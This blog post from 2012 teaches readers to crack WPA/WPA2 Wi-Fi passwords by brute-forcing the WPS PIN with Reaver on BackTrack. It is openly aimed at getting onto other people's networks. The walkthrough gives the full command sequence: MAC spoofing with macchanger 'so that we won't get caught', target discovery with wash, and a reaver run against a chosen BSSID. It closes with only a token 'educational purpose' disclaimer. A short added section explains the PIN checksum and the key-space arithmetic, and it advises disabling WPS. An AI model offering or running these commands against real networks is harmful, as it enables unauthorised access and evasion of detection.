
Thursday, November 15, 2012

Hacking WPA/WPA2 Wi-Fi Networks




Did you ever feel like learning how to hack Wi-Fi networks? Did you wish to use other people's Wi-Fi networks but couldn't, because you didn't know the network key?

If the answer to the above questions is YES, then this tutorial is for you.

The old Wi-Fi networks used WEP (Wired Equivalent Privacy). WEP was easily cracked, so two new security protocols, WPA (Wi-Fi Protected Access) and WPA2 (Wi-Fi Protected Access II), came into effect.
But in the world of computers, every lock either already has a key or will have one made for it sooner or later. So today we are going to learn about cracking WPA and WPA2 Wi-Fi passwords.

For this, you'll need the hackers' favorite operating system: BackTrack. To download BackTrack and learn about its installation, go to:

A WPA/WPA2 password can be cracked by capturing the WPA handshake and then running a dictionary attack against it. If the passphrase is in the dictionary, the password will be cracked, but this can take hours and in some cases even days. And what if the password is not in the dictionary?

So here we will learn a different way to crack these passphrases.

WPS :- Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a computing standard that attempts to make it easy to set up a secure wireless home network. It is enabled by default on most routers.

WPS has been shown to easily fall to brute-force attacks. A major security flaw was revealed in December 2011 that affects wireless routers with the WPS feature, which most recent models have enabled by default. The flaw allows a remote attacker to recover the WPS PIN in a few hours and, with it, the network's WPA/WPA2 pre-shared key. Users have been urged to turn off the WPS feature, although this may not be possible on some router models.

So, using Reaver we will brute-force the AP's (wireless access point's) WPS, attempting every possible combination in order to guess the AP's 8-digit PIN. Since the PIN is all numeric, there are 10^8 (100,000,000) possible values. However, because the last digit of the PIN is a checksum that can be calculated from the previous 7 digits, the key space is reduced to 10^7 (10,000,000) possible values.

The key space is reduced even further because the WPS authentication protocol splits the PIN in half and validates each half separately.

Reaver brute-forces the first half of the PIN and then the second half, so the entire key space for the WPS PIN can be exhausted in at most 11,000 attempts (10,000 for the first four digits, then 1,000 for the remaining three digits plus the fixed checksum). So the key concept here is that we can brute-force the PIN and, from it, recover the credentials stored on the access point, no matter how long the WPA passphrase is or which digits and special symbols it contains.
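The paragraphs above explain why the PIN key space collapses from 10^8 to 11,000 guesses. As an added example (not code from the original post or from Reaver), the script below implements the WPS PIN checksum rule from the Wi-Fi Protected Setup specification and works the key-space arithmetic through; the function names are my own and the sample PINs are constructed for illustration. From a defender's side, it shows concretely why the usual advice, turning WPS off wherever the router allows it, matters: the protocol design leaves nothing for a long WPA passphrase to protect.

```python
# Added example: why the WPS PIN key space collapses from 10^8 to 11,000 guesses.
# Not code from the original post. The checksum rule is the one defined in the
# Wi-Fi Protected Setup specification; function names and sample PINs are my own.


def wps_checksum(first_seven: int) -> int:
    """Return the checksum digit the WPS spec appends to a 7-digit PIN body.

    Digits are weighted alternately 3 and 1, starting with weight 3 on the
    rightmost digit; the checksum digit makes the weighted sum a multiple of 10.
    """
    accum = 0
    while first_seven:
        accum += 3 * (first_seven % 10)   # odd positions (counted from the right) weigh 3
        first_seven //= 10
        accum += first_seven % 10         # even positions weigh 1
        first_seven //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if `pin` is an 8-digit string whose last digit is the correct checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_checksum(int(pin[:7])) == int(pin[7])


def worst_case_attempts(split_validation: bool) -> int:
    """Guesses needed to exhaust the key space of well-formed PINs.

    Without the split, 10^7 PINs pass the checksum rule. With the split the AP
    confirms the first 4 digits on their own (10^4 guesses); only 3 free digits
    remain, because the 8th is fixed by the checksum (10^3 guesses).
    """
    if not split_validation:
        return 10 ** 7
    return 10 ** 4 + 10 ** 3


if __name__ == "__main__":
    # Constructed sample: the body 1234567 takes checksum digit 0.
    print(wps_checksum(1234567))                                   # 0
    print(is_valid_wps_pin("12345670"))                            # True
    print(is_valid_wps_pin("12345678"))                            # False
    print(worst_case_attempts(False), worst_case_attempts(True))   # 10000000 11000
```

The 11,000 figure is the worst case only when the access point answers every attempt; firmware that locks WPS after a run of failed PINs changes the time, not the size of the key space, which is why disabling WPS is the fix rather than relying on the lockout.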

Let's Start :

Boot your Backtrack :

First we will change the MAC address of our network card so that we won't get caught:

airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Now run the following command to list the available APs that have WPS enabled:

wash -i mon0

Now choose your target, note its BSSID, and issue the following command, replacing <bssid> with the target's BSSID:

reaver -i mon0 -b <bssid> -vv

Now wait until Reaver brute-forces the PIN. Once it's done, you'll have:

WPS Pin
WPA PSK
AP SSID

So, Enjoy Hacking!!!

NOTE: THIS IS FOR EDUCATIONAL PURPOSE ONLY AND IN NO WAY SHOULD BE MISUSED.
